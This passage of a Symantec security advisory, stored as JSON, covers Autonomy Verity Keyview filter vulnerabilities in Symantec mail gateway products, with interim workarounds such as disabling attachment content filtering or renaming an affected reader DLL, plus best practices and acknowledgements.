lzhsr_disabled.dll.\n * Content filtering will now NOT be performed for those attachments previously read by the affected reader(s).\n\n \n\n**Temporary Workaround to disable content filtering in Symantec Mail Security for Domino** \nInstallations of SMS for Domino that _do not_ utilize the Content Filtering capabilities of the product _are not_ susceptible to this issue. SMS for Domino would be susceptible only if the attachment content scanning option is enabled. \n \nAs an interim workaround, administrators may disable content filtering rules that contain parameters specifying scanning of attachment content. The rules do not need to be deleted, only disabled until an updated release is installed. \n \nTo disable content filtering rules for Symantec Mail Security for Domino:\n\n * Select the \"Content Filtering\" tab to display the list of currently enabled rules\n * Click on the checkmark to the left of any rules that utilize _attachment content_ filtering, changing it to a red \"X\" disabling the rule\n * Or, instead of disabling content filtering altogether, the administrator can rename only the affected readers until updates can be installed:\n * Go to the Verity bin folder of the product installation, e.g. SMSDOM -> Server -> Verity -> bin\n * Locate the affected binary, e.g. lzhsr.dll\n * Rename the binary, e.g. lzhsr_disabled.dll.\n * Content filtering will now NOT be performed for those attachments previously read by the affected reader(s).\n\n**Temporary Workaround to disable content filtering in Symantec Brightmail Gateway or Symantec Messaging Gateway** \nRisk from these issues is limited on installations of Symantec Brightmail or Symantec Messaging Gateway in which the attachment content scanning option is enabled. However, installations that do not utilize the Content Filtering capabilities of the product _are not_ affected by these issues. 
\n \nAs an interim workaround, administrators unable to upgrade to the recommended solution may disable content filtering rules that contain parameters that specify scanning of attachment content. The rules do not need to be deleted, only disabled until the updated release is installed. \n \nTo disable the content filtering rules for either Symantec Brightmail Gateway or Symantec Messaging Gateway:\n\n * Log into the management console and navigate to the SMTP Scanning Settings screen\n * Disable the item \"Enable searching of non-plain text attachments for words in dictionaries\", by deselecting the checkbox, and saving\n * Disable any Compliance policies with a condition:\n * \"If any part of the message matches\" (or \"does not match\") a regular expression, pattern or Record Resource.\n * \"If text in Attachment content part of the message . . . \"\n\n \n\n**Best Practices** \nAs part of normal best practices, Symantec strongly recommends:\n\n * Restrict access to administration or management systems to privileged users.\n * Restrict remote access, if required, to trusted/authorized systems only.\n * Run under the principle of least privilege where possible to limit the impact of exploit by threats.\n * Keep all operating systems and applications updated with the latest vendor patches.\n * Follow a multi-layered approach to security. Run both firewall and anti-malware applications, at a minimum, to provide multiple points of detection and protection to both inbound and outbound threats.\n * Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in detection of attacks or malicious activity related to exploitation of latent vulnerabilities\n\n### ACKNOWLEDGEMENTS\n\n \n\nWill Dormann and Jared Allar with [CERT](<http://www.cert.org/>)/CC identified multiple issues in the Autonomy Keyview module. 
Additional issues in the Autonomy Keyview module were identified by Secunia [Research](<http://secunia.com/research>), Binaryhouse.net working through iDefense [Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>) and [Core](<http://www.coresecurity.com/content/corelabs>) Technologies.\n\n### REFERENCES\n\n \n\n**BID:** Security Focus, [http://www.securityfocus.com](<http://www.securityfocus.com/>), has assigned a Bugtraq ID (BID) to these issues for inclusion in the Security Focus vulnerability database. BIDs have been assigned as indicated below \n**CVE:** These issues are a candidate for inclusion in the CVE list ([http://cve.mitre.org](<http://cve.mitre.org/>)), which standardizes names for security problems. The CVE initiative has assigned CVE IDs as indicated below.\n", "modified": "2020-03-05T20:50:44", "published": "2011-10-06T08:00:00", "id": "SMNTC-1236", "href": "", "type": "symantec", "title": "Multi-Vendor Autonomy Verity Keyview Filter Multiple Issues", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}